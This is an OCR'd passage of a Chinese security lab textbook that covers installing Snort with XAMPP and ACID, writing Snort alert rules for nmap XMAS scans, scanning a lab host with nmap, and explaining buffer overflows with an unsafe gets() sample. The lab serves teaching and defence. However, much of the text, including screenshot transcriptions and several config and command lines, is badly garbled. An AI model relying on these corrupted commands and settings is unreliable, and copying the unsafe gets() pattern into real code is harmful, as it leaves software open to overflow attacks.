2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 系统 、Snort、XAMPP、ACID。 

Snort 是 一 个 开放 源码 的 网 络 入 侵 检测 系统 , 它 可 以 对 网 络 流量 进行 实时 分 析 , 对 数 
据 包 进行 审计 ,还 可 以 进行 协议 分 析 , 对 内 容 进行 检索 /匹配 ,并 能 够 检测 出 多 种 类 型 的 入 
侵 和 探测 行为 ,如 隐秘 扫描 ,操作 系统 指纹 探测 .SMB 扫描 、 缓 冲 区 溢出 、CGI 攻击 等 。 
Snort 规则 是 入 侵 检测 系统 的 重要 组 成 部 分 ,规则 集 是 Snort 的 攻击 特征 库 , 每 条 规则 都 
对 应 一 条 攻击 特征 ,Snort 通过 它 来 识别 攻击 行为 ,每 一 条 规则 包括 规则 头 部 和 规则 选项 
两 个 部 分 。 

规则 头 部 是 一 个 七 元 组 ,由 动作 ,协议 . 源 IP 地 址 、 源 端口 号 方向 操作 符 、 目 的 IP 地 
址 和 目的 端口 号 构成 。 动 作 是 指 当 Snort 发 现 从 网 络 中 获取 的 数据 包 与 事先 定义 好 的 规 
则 相 匹 配 时 ,下 一 步 要 进行 的 处 理 方 式 。Snort 支持 alert, log, pass, activate, dynamic, 
drop,reject 等 动作 ,最 常见 的 动作 是 alert( 报 警 ) 。 各 动作 语义 如 下 。 
alert; 使 用 选择 的 报警 方法 生成 一 个 警报 ,并 记录 这 个 报 文 。 
log: 记录 报 文 。 
pass: 忽略 这 个 报 文 。 
activate: 进行 报警 (alert) ,然后 激活 另 一 个 dynamic 规则 。 
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* dynamic; 保持 空闲 直到 被 一 条 activate 规则 激活 ,被 激活 后 就 作为 一 条 log 规则 
执行 。 

可 以 定义 自己 的 规则 类 型 并 附加 一 条 或 更 多 的 输出 模块 ,然后 就 可 以 使 用 这 些 自 定 
义 规则 类 型 作为 snort 规则 的 一 个 动作 。 

XAMPP(Apache 十 MySQL 十 PHP 十 PERL) 是 一 个 功能 强大 的 建站 集成 软件 包 , 可 
快速 搭建 基于 Apache, MySQL, PHP 的 编程 调试 环境 。 

ACID( Analysis Console for Intrusion Database) 是 入 侵 数 据 库 分 析 控 制 台 , 它 是 一 
个 基于 PHP 的 分 析 引 擎 ,能 够 搜索 和 处 理 不 同 IDS、 防 火 墙 . 网 络 监视 工具 所 生成 的 网 络 
安全 事件 数据 库 , 其 功能 包括 用 户 搜索 界面 \ 包 浏览 警报 处 理 和 图 表 统 计 等 。 需 要 
ADODB:( Active Data Objects Data Base, 是 一 种 PHP 存 取 数 据 库 的 中 间 件 ) 和 JpGraph 
(一 个 面向 对 象 的 图 形 构建 PHP 库 ) 组 件 提供 支撑 。 


9.3.3 实验 步骤 


1. 安装 XAMPP 
(1) 运行 XAMPP-Win32-1.7.7-VC9-install. exe, 安 装 Apache、MySQL、PHP 环境 ， 
按 默认 选项 安装 即 可 ,安装 完成 后 ,打开 XAMPP 配置 界面 ,如 图 9. 1 所 示 。 


СО IMP Control Panel Application 


XAMPP Control Panel Version 2.5 (9. May, 2007) 


[Windows 5.2 Bui. 0 Platform 2 Service Pack 2 
Current Directo: \хашрр 


Install Directory: c:\xampp 
Status Check OR 


9.1 "X XAMPP 


(2) 在 MySQL 一 栏 里 , 单 击 Start 按钮 ,启动 MySQL 服务 ,然后 单 击 Admin 按钮 ， 
打开 phpmyadmin 数据 库 管理 界面 ,新 建 一 个 名 为 snort 的 新 数据 库 , 单 击 “ 创 建 ” 按 钮 ， 
完成 snort 数据 库 的 创建 ,如 图 9.2 所 示 。 

(3) 单 击 打开 创建 的 snort 数据 库 , 在 图 9. З 所 示 界 面 中 , 单 击 工具 栏 中 的 “导入 ” 按 
钮 ,选择 create_mysql 文 件 , 单 击 “ 执 行 ”按钮 ,建立 数据 表 , 如 图 9.4 所 示 。 

СД) 按照 同样 的 方法 创建 snort_archive 数据 库 并 导入 create. mysql 文件 中 的 数据 ， 
如 图 9.5、 图 9.6 所 示 。 

(5) 打开 d:\xampp\php\php. ini 文件 ,定位 到 error. reporting 设置 项 ,将 该 项 设置 
为 error reporting—- E ALL&.—E DEPRECATEDé-—E NOTICE. 10 9. 7 所 示 。 
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图 9.2 创建 数据 库 snort 
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图 9.3 导入 snort 数据 
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选择 导入 文件 
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图 9.5 6] snort archive 数据 库 
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图 9.6 导入 数据 文件 


б oho ec Моа Studio Code [NIST T 
зир WC) вло RW) ио WD) [CT 


日 Ephpin х m 


E_ALL (Show all errors, warnings and|^ ТӨС po St 人 Ne э 
EALL & ~E NOTICE (Show all errors, except тог notices) 
E ALL & -E NOTICE & ~E_STRICT (Show all errors, except for notices and coding standards war 
E COMPILE ERROR|E RECOVERABLE ERROR|E ERROR|E CORE ERROR (Show only errors) Р 
Default Value: E ALL & -E NOTICE & -E STRICT & -Е DEPRECATED 
Development Value: E ALL 
Production Value: E ALL & Е DEPRECATED & -E STRICT 


http://php.net/error-reporting 
БИБЕР - ғ Ац. а -Е ОЕРАЕСАТЕО 8 -Е МОТІСЕ 


; This directive controls whether or not and where PHP will output errors, 
notices and warnings too. Error output is very useful during development, but 
it could be very dangerous BÉ production environments. Depending on the code 
; which is triggering the error, sensitive information could potentially leak 
; out of your application such as database usernames and passwords or worse. 
It's recommended that errors be logged on production servers rather than 
having the errors sent to STDOUT 
Possible Values: 
Off = Do not display any errors 
stderr = Display errors to STDERR (affects only CGI/CLI binaries!) 
On or stdout = Display errors to STDOUT | 
; Default Value: On 
Development Value: On | 
Production Value: Off 


行 539, 列 0 Фа ига Саг NEN 


图 9.7 修改 php. ini 文 件 


2. 安装 ACID 


(1) 安装 ADODB: 


所 示 。 


(2) 安装 JpGraph: 解压 缩 JpGraph-2. 0. tar. gz 至 d:\xampp\php\jpgraph 目录 ,如 


图 9.9 所 示 。 


解压 缩 ADODB456. zip 至 d:\xampp\php\adodb 目录 ,如 图 9. 8 


图 9.8 解压 缩 ADODB456. zip 


pe FA 
rem mud жеее PERS 
LII коны P14430 алега 10 
Te res Mes 
Ie азии eei. Өс 
Tem A MER d 
Te poene эшип Spies 
Tees se ote Oa 
T маю | MR та 
T зимин жаны О um 
T et ЖО | 
) adodb tea) 7019/9/78 16:28. 
= 
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а мт (C) 
хә Tools (D) 
> Work (E) 
«ә Other (F) 
<> Backup (б) 
co жеше K) 


fre = 


jpgraph #28108: 2018/9/28 16:29 
| xe 


(3) 将 ACID 解压 到 目录 d:\xampp\htdocs 里 ,如 图 9. 10 所 示 。 


пени 


2018/9/28 16:28. 
2018/6/13 9:35 
2018/6/13 9:35 
2018/6/13 9:35 
2018/6/13 935 
2018/6/13 9:35 
2018/6/13 9:35 


2018/6/13 10:32 
2018/6/13 935 
2018/6/13 9:35 
2018/6/13 9:35 
2018/6/13 9:35 
2018/6/13 9:35 
2018/6/13 935 
2018/6/13 935 
2012/416 23:30 
2012/416 23:30 
2012/6/14 430 


图 9.9 解压 缩 JpGraph-2.0. tar. gz 


(4) 用 写字 板 打 开 其 中 的 acid. conf. php 文件 ,修改 ADODB 和 JpGraph 的 路 径 信 


息 ,代码 如 下 : 


$ DBlib path = "d:\xampp\php\adodb" ; 
$ ChartLib path= "d:\xampp\php VjpgraphNsrc" ; 


Ма 信息 系统 安全 实验 教程 
<A 


- ELO — 
OOM» ҥн › Tools (D) » xampp » htdocs » 

BR- дпя 包含 到 库 中 ARO 新 建文 件 夫 

X ome 2 = h пани 
h TE D acid 2018/9/28 16:31 
mam Л 2018/6/13 10.06 
Ed А forbidden. 2018/6/13 9:33 
Hawas А Joomla. 2018/6/29 10:24 

А restricted 2018/6/139:33 

as А xampp 2018/6/13 10:32 
Hanra = apache pb gif. 2012/4/1623:30 Kankan GIF BE экв 
B ws Eà apache phpng 20124162330 Kankan PNG BE экв 
sm 9 a apane pozai 0  Kmkeick DA экв 
B xti à apache. pb2.png 20124/162330 Kankan PNG BE экв 
4 аж wè apache pb2 anigif 20124162330 Kankan GIF IE экв 

E teviconkco 2014162330 Kankan ICO EB sk 

энил B index htmt 2012/4/1623:30 Firefox HTML D. 1кв 
& Win? (C) fd index.php 20124062230 PHP Z T 
чә Tools (D) М testphp 2018/6/1411:19 。 PHP IERP їкв 
s» Work (E) 园 xss prevphp 2014617946 PHP RRI экв 
s» Other (Р) 
Bakw(G) ЦІ 
> жшше (к) 

] acid ВИ: 2018/9/28 16:31 
ПЕ 


图 9.10 安装 JpGraph 


修改 数据 库 配置 信息 如 图 9. 11 一 图 9. 13 所 示 。 


т acid_confphp X 


<?рһр 
$ACID VERSION = "0.9.6b23"; 


Path to the DB abstraction library 
(Note: DO NOT include а trailing backslash after the directory) 
e.g. $foo : [ok] 
gfoo [ок] 
$foo " [ok] 
M $foo " [WRONG] 
”/ 
$08lib path = "d: VxampplphpVadodb*. 


The type of underlying alert database 


MySQL "mysql 
PostgresSQL : "postgres 
MS SQL Server : "mssql" 
Ji 
$DBtype = "mysql"; 
/* Alert DB connection parameters 
*  - $alert dbname : MySQL database name of Snort alert DB 
* -$alert_host : host on which the DB is stored 
» -galert port port on which to access the DB 


行 15, 列 26 94 UTF8 IF РР NE SI 


图 9.11 修改 数据 库 配 置信 息 $ DBlib path 


(5) PU V http://localhost/acid/acid db setup. php, 创 建 入 侵 数 据 库 , 如 图 9.14, 
图 9.15 所 示 。 

3. 安装 Snort 

CD 安装 实验 工具 包 里 的 WinPcap 软件 ,然后 运行 Snort 2 8 3 1 Install. ехе, 1 


^ 
mos ABRENEXA dp 
mp 


ъ ы 


$use referential integrity 


$ChartLib path 


$chart file format - "png 


hart default 
$cha 


$cha 
$chart bg color default = array(255,255,255); 


$chart lgrid color default = array(205,205,205); 
$chart bar color default = array(190, 5, 5); 


$show rows = 50; 


图 9.12 修改 数据 库 配 置信 息 $ ChartLib path 


UC алсу теу инс WD) юп тюн 


$alert dbname 
$alert host 
$alert port 
$alert user 
galert_password 


Sarchive dbname 


archive host 
$archive_port 
$archive_user 
$archive_password = 


图 9.13 修改 数据 库 配 置信 息 


默认 选项 安装 ,安装 到 c:\snort 目录 下 。 
(2) 打开 Snort 配置 文件 c:\snortNetc\snort. conf. 如 图 9. 16 所 示 , 将 include 
classification. config.include reference. config 等 改 为 绝对 路 径 , 即 : 


include c:/snort/etc/classification. config 


include c:/snort/etc/reference. config 


Мар/ ваквоезиве 
—— —— 


© | © localhost/aci/acid db setup php. Ek» 


Operation Description 
ACID tables  Adás tables to ecend Ina Snort DB to support ine ACID functonaity reste ACID AG. 
Search indexes DONE 


lOptonal) Ads indoxos о те Snort D8 to optmge е speed of те quenes 
[Loaded in 0 seconds] 


Roman Danyi ACERT 


图 9.14 创建 入 侵 数 据 库 


€ Q © localhost/aci php. toi 

жо DB Setup Зашел — 
[Back] 

ороо зш] 

моюн Adds tables to extend tho Snort DB to support the ACID functionality ome 

bp ‘(Optonal) Adds indexes to the Snort DB to optimize me speed of hoe quenes осма 

те анун лел DD иоле tor usaga wen ACID 

даааола 08 permissions 

frd i Rer n he зене by t praedi ders от аймаа) аз О оз од caching Ps DB st ouf aet ате e DELETE and UPDATE prie on e dits 

SR 


Goto the Main page to uso the appicaton 


[Loaded in 1 seconds] 


Roman Darytw prz 


图 9.15 入 侵 数据 库 创 建成 功 


G) 如 图 9.17 所 示 , 在 Snort 配置 文件 e: NsnortVeteNsnort. conf 中 ,将 dynamicpreprocessor 
directory /usr/local/lib/Snort dynamicpreprocessor it Jj dynamicpreprocessor directory 
с: \ snort \ lib \ Snort _ dynamicpreprocessor; 将 dynamicengine /usr/local/lib/Snort | 
dynamicengine/libsf engine. so 改 为 dynamicengine c:\snort\lib\Snort_dynamicengine\ 


sf_engine. dll, 


LL 
行 889, 列 1 CHA UIF8 IF Propos Ө A 


图 9.16 添加 Snort 引用 文件 


S con cont VRBIS Co E жн O T e m Ho 


зеп бий) ашо пау юно до) т жюн 


д о zm conf х 


# the command line as well 


в 


® 


в 

y 4 — dynamicpreprocessor directory c:/snort/lib/snort dynamicpreprocessor 
Load a specific dynamic ВЕРЕС ЕЗ library from the install path 
(same as command line option --dynamic-BREBROEESSOR-1ib) 


dynamicpreprocessor file /usr/local/lib/snort dynamicpreprocessor/libdynamicexample.so 


Load a dynamic engine from the install path 
(same as command line option --dynamic-engine-lib) 


dynamicengine c:/snort/lib/snort. dynamicengine/sf engine.dll 


Load а11 dynamic rules libraries from the install path 
(same as command line option --dynamic-detection-lib-dir) 


dynamicdetection directory /usr/local/lib/snort dynamicrule/ 


Load a specific dynamic rule library from the install path 
(same as command line option --dynamic-detection-lib) 


Lr 


LLULUM- MINI N NES 


图 9.17 修改 Snort 配置 文件 参数 


(4) 如 图 9. 18 所 示 ,在 Snort 配置 文件 c:\snort\etc\snort. conf 的 最 后 一 行 ， 
下 代码 ,使 得 所 有 的 报警 信息 都 保存 在 数据 库 中 : 
Output database:alert, mysql, host = localhost user = root dbname = Snort encoding = hex detail = full 


(5) 将 Snort 作为 网 络 嗅 探 模式 时 ,在 命令 行 界面 中 输入 命令 snort -dev, 其 结果 如 
图 9. 19 所 示 。 


添加 如 
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orco Eaa 
зр mmc ел UG) Фар) бя) яо 


© snortconf X 


Te 


# include $PREPROC RULE PATH/preprocessor.rules 
# include $PREPROC RULE PATH/decoder.rules 


д 
# Include any thresholding or suppression commands. See threshold.conf in the 
y # «snort src»/etc directory for details. Commands don't necessarily need to be 
# contained in this conf, but а separate conf makes it easier to maintain them. 
# Note for Windows users: You are advised to make this an absolute path, 
图 # such as: c:VsnortVetcVthreshold.conf 
# Uncomment if needed. 
[ conf 

lert,mysql,host-localhost user=root dbname-snort encoding-hex дебаі1- 1 


图 9.18 添加 报警 信息 到 数据 


E 


ва: cAwindowstystems zvemd exe WIN өе c£ 


09/30-09:19:52.918970 0:0:5E:0:1:1 -> BC:30:5B:9D:2:C1 type:0x800 len:9x46 
26.19.1.249 -> 26.28.248.147 ICMP TTL:252 Т05:0х0 ID:65033 IpLen:20 DgmLen:56 
Туре:3 Соде:Ә DESTINATION UNREACHABLE: NET UNREACHABLE 

xx ORIGINAL DATAGRAM DUMP: 

26.28.248.147:63423 -> 180.76.76.76:53 UDP TTL:61 Т05:0х0 ID:8713 IpLen:20 DgmLe| 
п:59 

Д-еп: 31 Csum: 41522 

[рх END OF DUMP 

N45 00 00 3B 22 09 00 00 3D 11 48 61 1A 1C F8 93 E. 

(Вч 4C 4C 4C F7? BF 00 35 00 27 A2 32 


ЫСЫ 


xxx* Caught Int-Signal 
Run time prior to being shutdown was 16.879000 seconds 


Packet Wire Totals 
Received: 105 
finalyzed: 105 (100.0007.) 
0 (0.000% 
9 (9.0002) 


Breakdown by protocol (includes rebuilt packets): 
ЕТН: 195 (100.0002) 
ETHdisc: 0 (0.000%) 


图 9.19 Snort 网 络 嗅 探 模式 


(6) 将 Snort 作为 数据 包 记 录 模 式 时 ,在 命令 行 界 
. /log, 其 结果 如 图 9. 21 所 示 。 

4. ME Snort 的 入 侵 检 测 模式 .进行 入 侵 检 测 操作 

(1) 解压 snortrules-snapshot-2973. tar. gz, 将 解压 后 的 rules 子 目 录 


psi 


.20 中 输入 命令 snort -1 


的 文件 复制 到 
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(Як: CAWindowsYsystem32Vcmd.exe - snort -1 /log - 


C:\Snort\bin>snort -1 ./1og 
Running in packet logging mode 
Log directory = ./1o9 


= Initializing Snort == 
Initializing Output Plugins?! 
Uerifying Preprocessor Configurations! 
boo 
xxx interface device lookup found: V 
beo 


[Initializing Network Interface \Оеоісе\МРҒ  (R3TEFC96-0F67-4654-8048-51D893BD6D1D 

) 

[Decoding Ethernet on interface \Device\NPF_(A37EFC96-0F67-4654-8048-51D893BD6D1 D] 

) 
= Initialization Complete 


-x> Snort? <x- 

Uersion 2.8.3.1-ODBC-MySQL-FlexRESP-UIN32 GRE (Build 17) 

By Martin Roesch & The Snort Team: http: //wwu.snort.org/team.html 
(C) Copyright 1998-2008 Sourcefire Inc., et al 

Using PCRE version: 7.4 2007-09-21 


PCAP FRAMES 


图 9.20 Snort 数据 包 记录 模式 


snortJog.1538270529 ware 201820. 


图 9.21 Snort 日 志文 件 


c:\snort\rules 目录 下 ,如 图 9. 22 所 示 。 
(2) 用 写字 板 打 开 scan. rules, 如 图 9. 23 所 示 ,在 文件 后 面 添加 如 下 规则 并 保存 : 
alert tcp $ EXTERNAL МЕТ апу -> $ HOME NET any(msg:"SCAN nmap XMAS"; flow:stateless;flags: 


FPU, 12; reference:archnids,30;classtype:attempted - recon; sid:1228;rev:7;) 
alert icmp any any – > $ НОМЕ NET any(msg:" icmp Packet"; sid:1234567890;rev:1;) 


ата app-detect ries эоюллазза RULES ZS sa 
mcm attack responses niies экв 
3 ereman backdoor rules 2 
Hawas bad-traffic rules 2к8 
blacklist res inus 
ar botnet me rules экв 
Banas browser chrome rules wanasa нив в 
йаш browser-fretoxndes пепла 5а RULES мка 
sw browser ie res плаха — RUSSE экв 
H browser other ndes жлеллауза Ruus te wa 
n browser pluies rules manasa таян 135562 
browser webkit res. mennas плаж зка 
жиш нге ruS 2 те 
ae Wer c) content-repiace noies тиг sa 
= Tool (0) doses тав en зка 
> Work (E) deleted rules тв яя юа 
> обе) бетде тиза 1a 
s» Backup (6) dox les sanos mue 1ка 
= ая к) experimenta rles пал — mne ка 
exploit res masman RASA 2 
ењ esploit Gi nds NUM S34 RU e 
ie-esecuable res аллау мавз зка 
fle ish rules 2оњлла зза Ruus ae nsa 
Че emoty rutes элла уза Rue aa 
fe imagenes menna 524 мка 
Bo jo es ыла изка 
fle molíomedia rules m 
Me ofice ries м a 

пе other rules minsaa яла » E 

canrules өй 2013/6/20 31 ORARE 20139/30925 
вице зй жк 


ГА 9.22 解压 缩 并 复制 Snort 规则 文件 


эзы бир ау) пау мно) җил) ет OO 


Sourcefire, Inc. (the "VRT Certified Rules") that are distributed under the VRT 
Certified Rules License Agreement (v 2.0), and (ii) rules that were created by 
Sourcefire and other third parties (the "GPL Rules") that are distributed under the 
GNU General Public License (GPL), v2. 


The VRT Certified Rules are owned by Sourcefire, Inc. The GPL Rules were created 
by Sourcefire and other third parties. The GPL Rules created by Sourcefire are 
owned by Sourcefire, Inc., and the GPL Rules not created by Sourcefire are owned by 


their respective creators. Please see http://www.snort.org/snort/snort-team/ for a 
list of third party owners and their respective copyrights. 


In order to determine what rules are VRT Certified Rules or GPL Rules, please refer 
to the VRT Certified Rules License Agreement (v2.0). 


SCAN RULES 


alert tcp $EXTERNAL_NET any -> $HOME_NET апу (msg:"SCAN nmap XMAS";flow:stateless;flags:FPU,12;re 
alert icmp any any -> $HOME_NET any [jmsg:"icmp Packe 1d:1234567890;rev:1;[] 


422,908 вл s 1 @ а 


图 9.23 添加 规则 
G) 打开 命令 行 窗口 ,进入 c:\snort\bin 目录 ,执行 如 下 命令 : 


Snort. exe – с "c:\snort\etc\snort. conf" — 1 c:\snort\log 


Snort 的 人 侵 检 测 模式 如 图 9. 24 所 示 。 
(4) 打开 Nmap, 使 用 -sX 方式 对 主机 进行 扫描 ,如 图 9. 25 所 示 。 


BIF ”入侵 检测 系统 


Initializing Network Interface XDeviceWNPF (R3TEFC96-0F67-5654-8048-51D893BD6D1D| 


Ethernet on interface \Оеџісе\МРЕ (R3TEFC96-0F67-5654-8048-51D893BD6D1D) 


: compiled support for ( mysql odbc ) 
: configured to use mysql 
host = localhost 
user = root 
: database name = snort 
: data encoding = hex 
: detail level = full 
sensor name = НОРЕ-ШТ7 :\Device\NPF_(A37EFC96-0F67-4654-8048-51D893BD6] 


sensor id = 1 
: schema version 107 
: using the “alert” facility 


[ Port Based Pattern Matching Memory ] 

+-[AC-BNFA Search Info Summary] 
Instances H 

| Patterns 

| Pattern Chars 

1 Num States H 

| Num Match States : 


图 9.24 Snort Af 


——— 


图 9 


Namp 主机 扫描 


(5) 通过 在 靶 机 中 打开 http://localhost/acid/acid_main. php, Æ ACID 中 查看 


Snort 报警 信息 .如 图 9. 26 所 示 。 


e» 
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E] Analysis Console forir ж 
€ э с | O localhosa Ek»: 


Analysis Console for Intrusion Databases Д 


Addad 1 sers) to те Alt cache 
Queried on Sun September 30, 2018 01:41:12 

Database ыксал. (schema version: СУ 

Time window: [2018-09-30 09 35 251- [201-09-30 08:41-10) 


Sensors: 1 

unique Alerts: 1 

[Total Number of Alerts: 113 
+ болса IP addresses. 1 


* Dest IP dresses 1 
* Unique IP inks 1 


Pons о 
= TCP (0) UDP (0) 


= TCP (0) UDP (0) 


+ Last source Ports any ТСР ШОР 
1 Last Desinaton Ports any , ТСР. UOP 
^ Graph alor detection time. 


* Alert Group (AG) maintenance. 
* Application cache and status 


[Loaded in 0 seconds] 


图 9.26 浏览 Snort 报警 信息 


9.4 & J й 


(1) 怎样 使 用 入 侵 检测 系统 Snort 对 SQL 注入 数据 包 进 行 监测 和 报警 ? 
(2) 怎样 通过 ACID 进行 网 络 报 文 的 统计 ? 


缓冲 区 溢出 攻击 与 防护 


10.1 Ж Ж 


缓冲 区 是 程序 运行 时 在 内 存 中 临时 存放 数据 的 地 方 , 一 般 是 一 块 连续 的 内 存 区 域 。 
缓冲 区 就 如 一 个 水 杯 , 如 果 在 杯 中 加 入 太 多 的 水 后 ,水 就 会 溢出 到 杯 外 。 同 样 , 缓 冲 区 也 
有 溢出 的 问题 。 缓 冲 区 溢出 是 因为 用 户 向 程序 中 提交 的 数据 超出 了 数据 接收 区 所 能 容纳 
的 最 大 长 度 ,从 而 使 提交 的 数据 超过 相应 的 边界 而 进入 了 其 他 区 域 。 如 果 是 人 为 蓄意 向 
缓冲 区 提交 超 长 数据 从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 或 对 系统 正常 运行 
造成 了 不 良 影响 ,那么 我 们 就 说 发 生 了 缓冲 区 溢出 攻击 (Buffer Overflow)。 缓 冲 区 溢出 
主要 包括 基于 堆栈 的 缓冲 区 溢出 、 基 于 堆 的 缓冲 区 溢出 以 及 基于 数据 段 的 缓冲 区 溢出 。 
一 般 来 说 , 堆 和 数据 段 的 缓冲 区 溢出 很 难 被 攻击 者 利用 ,而 堆栈 上 的 缓冲 区 溢出 漏洞 容易 
被 利用 ,具有 极 大 的 危险 性 。 

C 语言 的 标准 库 是 多 数 缓冲 区 溢出 问题 的 根源 所 在 ,尤其 是 一 些 对 字符 串 进行 操作 
的 库 函 数 , 例 如 要 从 标准 输入 中 读 取 一 行 输入 数据 时 可 调用 的 gets() 函 数 , 它 会 一 直 读 入 
数据 直到 遇 到 换行 字符 或 EOF 字符 ,并 不 会 检查 缓冲 区 边界 。 例 如 以 下 这 段 代 码 : 

char buffer[512]; 

gets(buffer) 

这 段 代码 中 定义 了 一 个 长 度 为 512 的 字符 数组 ,接着 输入 数据 被 gets O 函数 读 取 并 
ЖА. buffer 数组 中 ,所 读 取 的 数据 一 般 情况 下 可 能 都 小 于 512 个 字符 ; 但 如 果 输 入 大 于 
512 个 字 节 的 数据 , 则 将 超出 buffer 空间 而 覆盖 其 他 内 存 数据 ,从 而 发 生 缓冲 区 溢出 。 具 
有 类 似 问 题 的 标准 库 函 数 还 有 strcat()、sscan()、strcpy()、scan(),fscanf()、sprintf()、 
vscanf()、vsscanf()、vfscanf() 等 。 

从 现象 上 看 .缓冲 区 溢出 可 能 会 导致 : 

(1) 应 用 程序 异常 ; 

(2) 系统 服务 频繁 出 错 ; 

(3) 系统 不 稳定 甚至 崩溃 。 

从 后 果 上 看 ,缓冲 区 溢出 可 能 会 造成 : 

CD 以 匿名 身份 直接 获得 系统 最 高 权限 s 

(2) 从 普通 用 户 提升 为 管理 员 用 户 ; 
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(3) 远程 植 入 代码 执行 任意 指令 ; 

(4) 实施 远程 拒绝 服务 攻击 。 

产生 缓冲 区 洪 出 的 原因 有 很 多 ,如 程序 员 的 玻 忽 大 意 ,C 语言 等 编译 器 不 作 越界 检 
查 等 。 


10.2 缓冲 区 溢出 原理 与 防范 方法 


10.2.1 缓冲 区 溢出 原理 


“ 栈 ? 是 一 块 连续 的 内 存 空 间 , 用 来 保存 程序 和 函数 执行 过 程 中 的 临时 数据 ,这 些 数据 
包括 局 部 变量 类、 传人 / 传 出 参数 .返回 地 址 等 。 栈 的 操作 遵循 后 人 先 出 (Last In First 
Out,LIFO) 的 原则 ,包括 出 栈 (POP 指令 ) 和 入 栈 (PUSH 指令 ) 两 种 。 栈 的 增长 方向 为 从 
高 地 址 向 低地 址 增长 , 即 新 和 人 栈 数据 存放 在 比 栈 内 原 有 数据 更 低 的 内 存 地 址 ,因此 其 增长 
方向 与 内 存 的 增长 方向 正好 相反 。 

有 3 个 CPU 寄存 器 与 栈 有 关 。 

* SP(Stack Pointer. x86 指令 中 为 ESP,x64 指令 中 为 RSP), 即 栈 顶 指针 , 它 随 着 数 

据 入 栈 、. 出 栈 而 变化 。 

* BP(Base Pointer. x86 指令 中 为 EBP,x64 指令 中 为 RBP) , 即 基地 址 指针 , 它 用 于 

标示 栈 中 一 个 相对 稳定 的 位 置 . 通 过 BP 可 以 方便 地 引用 函数 参数 及 局 部 变量 。 

* IP(Instruction Pointer. x86 指令 中 为 EIP.x64 指令 中 为 RIP) , 即 指令 寄存 器 ,在 

调用 某 个 子 函 数 (call 指令 ) 时 , 隐 含 的 操作 是 将 当前 的 IP 值 ( 子 函数 调用 返回 后 
下 一 条 语句 的 地 址 ) 压 入 栈 中 。 

当 发 生 函 数 调用 时 ,编译 器 一 般 会 形成 如 下 程序 过 程 : 

CD 将 函数 参数 逆序 压 和 人 栈 中 。 

(2) 将 当前 IP 寄存 器 的 值 压 入 栈 中 ,以 便 函 数 完成 后 返回 父 函 数 。 

G) 进入 函数 ,将 BP 寄存 器 值 压 人 栈 中 ,以 便 函数 完成 后 恢复 寄存 器 内 容 至 函数 之 
前 的 内 容 。 

(4) 将 SP 值 赋值 给 BP, 再 将 SP 的 值 减 去 某 个 数值 用 于 构造 函数 的 局 部 变量 空间 ， 
其 数值 的 大 小 与 局 部 变量 所 需 内 存 大 小 相关 。 

(5) 将 一 些 通用 寄存 器 的 值 依次 入 栈 , 以 便 函 数 完成 后 恢复 寄存 器 内 容 至 函数 之 前 
的 内 容 。 

(6) 开始 执行 函数 指令 。 

(т) 函数 完成 后 ,依次 执行 程序 过 程 (5)、(4)、(3)、(2)、(1) 的 道 操作 , 即 先 恢复 通用 
寄存 器 内 容 至 函数 之 前 的 内 容 ,接着 恢复 栈 的 位 置 ,恢复 BP 寄存 器 内 容 至 函数 之 前 的 内 
容 , 再 从 栈 中 取出 函数 返回 地 址 之 后 返回 父 函 数 ,最 后 根据 参数 个 数 调整 SP 的 值 。 

由 于 C/C++ 语言 没有 数组 越界 检查 机 制 , 当 向 局 部 数组 缓冲 区 里 写 入 的 数据 超过 为 
其 分 配 的 大 小 时 ,就 会 发 生 缓冲 区 溢出 。 攻 击 者 可 利用 缓冲 区 溢出 来 自 改 进程 运行 时 栈 ， 
从 而 改变 程序 正常 流向 , 轻 则 导致 程序 崩溃 . 重 则 导致 系统 特权 被 窃取 。 
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如 图 10.1 所 示 , 若 将 长 度 为 16 字 节 的 字符 


串 赋 给 acArrBuf 数组 , 则 系统 会 从 acArrBuf[0] | ГТ ES 
开始 向 高 地 址 填充 栈 空间 ,导致 覆盖 EBP (URL S E 
数 返回 地 址 。 车 攻击 者 用 一 个 有 意义 的 地 址 ( 否 Е 
Ш 2: tH ЭБЕ МЕЙ TE GE EHEM РУ A, 函数 返 =н" 
低地 址 acArrBuf[3---0] 


回 时 就 会 去 执行 该 地 址 处 事先 安排 好 的 攻击 代 
码 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程 图 10.1 程序 运行 堆栈 布局 图 
序 运行 一 个 用 户 shell, 再 通过 shell 执行 其 他 命 
令 。 若 该 程序 有 root 或 suid 执行 权限 , 则 攻击 者 就 获得 一 个 有 root 权限 的 shell, 进 而 可 
对 系统 进行 任意 操作 。 

除 通 过 使 堆栈 缓冲 区 溢出 而 更 改 返回 地 址 外 ,还 可 改写 局 部 变量 (尤其 函数 指针 ) 以 
利用 缓冲 区 溢出 缺陷 。 


10.2.2 缓冲 区 溢出 攻击 防护 


防范 缓冲 区 溢出 问题 的 准则 是 : 确保 作 边界 检查 (通常 不 必 担 心 影响 程序 效率 ); 不 
要 为 接收 数据 预 留 相对 过 小 的 缓冲 区 ,大 的 数组 应 通过 malloc/new 分 配 堆 空间 来 解决 ; 
在 将 数据 读 入 或 复制 到 目标 缓冲 区 前 ,检查 数据 长 度 是 否 超过 缓冲 区 空间 。 

目前 有 四 种 基本 的 方法 保护 缓冲 区 免 受 缓冲 区 溢出 的 攻击 和 影响 。 

1. 强制 要 求 编写 正确 的 代码 

编写 正确 的 代码 是 一 件 非 常 有 意义 但 耗 时 的 工作 ,特别 像 编写 C 语言 那 种 具有 容易 
出 错 倾 向 的 程序 (如 字符 串 的 零 结尾 ), 这 种 风格 是 由 于 追求 性 能 而 忽视 正确 性 引起 的 。 
尽管 花 了 很 长 的 时 间 使 得 人 们 知道 了 如 何 编 写 安全 的 程序 ,具有 安全 漏洞 的 程序 依旧 出 
现 。 因 此 人 们 开发 了 一 些 工 具 和 技术 来 帮助 经 验 不 足 的 程序 员 编写 安全 正确 的 程序 。 虽 
然 这些 工 具 帮 助 程序 员 开发 更 安全 的 程序 ,但 是 由 于 C 语言 的 特点 ,这 些 工具 不 可 能 找 
出 所 有 的 缓冲 区 溢出 漏洞 。 所 以 , 侦 错 技术 只 能 用 来 减少 缓冲 区 溢出 的 可 能 ,并 不 能 完全 
地 消除 它 的 存在 。 除 非 程序 员 能 保证 他 的 程序 万 无 一 失 , 和 否则 还 是 要 用 到 以 下 部 分 的 内 
容 来 保证 程序 的 可 靠 性 。 

2. 通过 操作 系统 使 得 缓冲 区 不 可 执行 

